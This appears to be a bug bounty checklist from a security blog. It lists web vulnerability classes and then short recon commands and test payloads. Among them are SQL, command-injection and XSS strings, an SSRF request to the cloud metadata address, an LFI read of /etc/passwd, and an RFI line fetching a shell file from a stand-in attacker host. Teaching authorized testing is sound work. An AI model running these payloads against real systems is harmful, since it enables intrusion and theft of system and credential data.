Your go-to arsenal of techniques, vectors, and gotchas in the wild world of bounty hunting.
🔍 Reconnaissance
✅ Subdomain Enumeration (`amass`, `subfinder`, `crt.sh`)
✅ Port Scanning (`nmap`, `rustscan`)
✅ Directory Bruteforcing (`ffuf`, `dirsearch`)
✅ Wayback Machine / Archive Recon
✅ JS File Analysis (endpoints, keys, secrets)
✅ ASN/CIDR Discovery
✅ Virtual Host Discovery
✅ Content Discovery (`robots.txt`, `sitemap.xml`)
✅ GitHub Dorking (company leaks, tokens)
✅ Search Engine Dorks (Google, Shodan, Censys)
✅ WHOIS & DNS Recon
✅ DNS Zone Transfers
💣 Injection Attacks
✅ SQL Injection (classic, blind, time-based)
✅ Command Injection (`;`, `&&`, `|`, OS injection)
✅ XML External Entity (XXE)
✅ Server-Side Template Injection (SSTI)
✅ LDAP Injection
✅ CRLF Injection
✅ HTTP Host Header Injection
✅ GraphQL Injection
✅ NoSQL Injection (MongoDB, Firebase abuse)
💥 XSS (Cross-Site Scripting)
✅ Reflected XSS
✅ Stored XSS
✅ DOM-Based XSS
✅ Self-XSS
✅ CSP Bypass Techniques
✅ Mutation XSS
✅ Angular/React/Vue-specific XSS
✅ XSS in SVG/MathML
✅ WAF/Filter Bypass Payloads
🔓 Authentication & Session
✅ Authentication Bypass
✅ 2FA Bypass Techniques
✅ Session Fixation
✅ Session Hijacking
✅ JWT Attacks (`none` alg, key confusion)
✅ Cookie Poisoning / Tampering
✅ Login CSRF
✅ Password Reset Abuse
✅ Email Enumeration
✅ Username Enumeration
✅ Brute-force / Rate-limiting Bypass
✅ MFA Abuse (fallback channels, reuse)
🔐 Authorization & Access Control
✅ Broken Access Control (BAC)
✅ Insecure Direct Object Reference (IDOR)
✅ Horizontal Privilege Escalation
✅ Vertical Privilege Escalation
✅ Role Confusion / Scope Abuse
✅ Function-level Access Control Flaws
✅ Admin Panel Access via Frontend/API
📂 File Handling & Uploads
✅ Unrestricted File Uploads
✅ Content-Type Validation Bypass
✅ Polyglot Files
✅ SVG Upload with XSS Payload
✅ Upload Path Traversal
✅ Remote File Inclusion (RFI)
✅ Local File Inclusion (LFI)
✅ File Deserialization (PHP, Java, etc.)
✅ ImageTragick (ImageMagick Exploits)
🌐 Web Infrastructure
✅ SSRF (Server-Side Request Forgery)
✅ Open Redirects
✅ CORS Misconfigurations
✅ Clickjacking (X-Frame-Options issues)
✅ Host Header Injection
✅ DNS Rebinding
✅ HTTP Request Smuggling
✅ HTTP Parameter Pollution
✅ Cache Poisoning
✅ Subdomain Takeover
✅ CDN Misconfiguration
✅ Path Traversal (`../` abuse)
🔄 Business Logic & API
✅ Logic Flaws (order bypass, payment manipulation)
✅ Race Conditions
✅ Mass Assignment
✅ Insecure API Rate Limiting
✅ Broken Object Level Authorization (BOLA)
✅ GraphQL Misconfig (introspection, object access)
✅ Unprotected Endpoints
✅ Lack of Input Validation (trust boundaries)
✅ Misuse of HTTP Verbs (`PUT`, `DELETE`, `PATCH`)
☁️ Cloud & External Services
✅ AWS/GCP/Azure Misconfig (S3 buckets, secrets)
✅ Leaky Environment Variables
✅ CI/CD Secrets (GitHub Actions, GitLab CI)
✅ Publicly Exposed Dashboards (Kibana, Grafana, Jenkins)
✅ Metadata Services Access (AWS IMDS, GCP metadata)
✅ Exposed `.env`, `.git`, `.DS_Store`, backup files
⚙️ Misc & Advanced
✅ Prototype Pollution
✅ Deserialization Attacks (PHP, Java, Ruby)
✅ WebSocket Hijacking
✅ Caching Bugs (Varnish, NGINX configs)
✅ DNS Cache Poisoning
✅ Frontend Framework Bypasses
✅ CVEs on Outdated Libraries
✅ Supply Chain Attacks
✅ Software-Specific Exploits (WordPress, Magento, etc.)
✅ Secret Discovery (API keys, tokens in source or logs)
You Should Know:
Essential Commands & Tools for Bug Bounty Hunters
Reconnaissance
Subdomain Enumeration:
amass enum -d example.com
subfinder -d example.com -o subs.txt
Port Scanning:
nmap -sV -p- -T4 target.com
rustscan -a target.com --ulimit 5000
Directory Bruteforcing:
ffuf -u https://target.com/FUZZ -w wordlist.txt
dirsearch -u https://target.com -e php,html,js
Injection Attacks
SQL Injection Test Payloads:
' OR '1'='1
" OR 1=1 --
UNION SELECT username, password FROM users--
Command Injection Test Payloads:
; whoami
`id`
$(cat /etc/passwd)
XSS Payloads:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
javascript:alert(document.domain)
SSRF Exploitation
Testing SSRF:
curl "http://vulnerable.com/fetch?url=http://169.254.169.254/latest/meta-data"
File Inclusion (LFI/RFI)
LFI Test:
curl "http://target.com/page.php?file=../../../../etc/passwd"
RFI Test:
curl "http://target.com/page.php?file=http://attacker.com/shell.txt"
JWT Tampering
None Algorithm Attack:
echo -n '{"alg":"none"}' | base64
Cloud Misconfigurations
Checking AWS S3 Buckets:
aws s3 ls s3://bucket-name/
What Undercode Says:
This checklist is a goldmine for bug bounty hunters and security researchers. Mastering these techniques requires hands-on practice. Always test in authorized environments and follow ethical guidelines. Automation helps, but manual testing uncovers the most critical flaws. Stay updated with new attack vectors and CVEs.
Expected Output:
A structured, actionable guide for web app penetration testing with verified commands and techniques.
References:
Reported By: Wesley Thijs – Hackers Feeds